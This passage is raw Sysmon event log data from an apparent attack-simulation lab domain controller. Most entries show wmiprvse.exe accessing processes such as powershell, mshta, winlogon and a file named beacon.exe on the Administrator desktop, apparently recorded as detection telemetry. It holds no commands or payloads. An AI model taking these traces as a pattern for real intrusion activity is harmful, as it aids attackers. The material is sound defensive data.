\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A9B26B0761EFF1C5003171B5B78175,SHA256=5D2AE46932435066D291B5F4D7F94DB849197EB9C1A794287DB7602CDE3761E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B8AA-00000000AD01}12596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 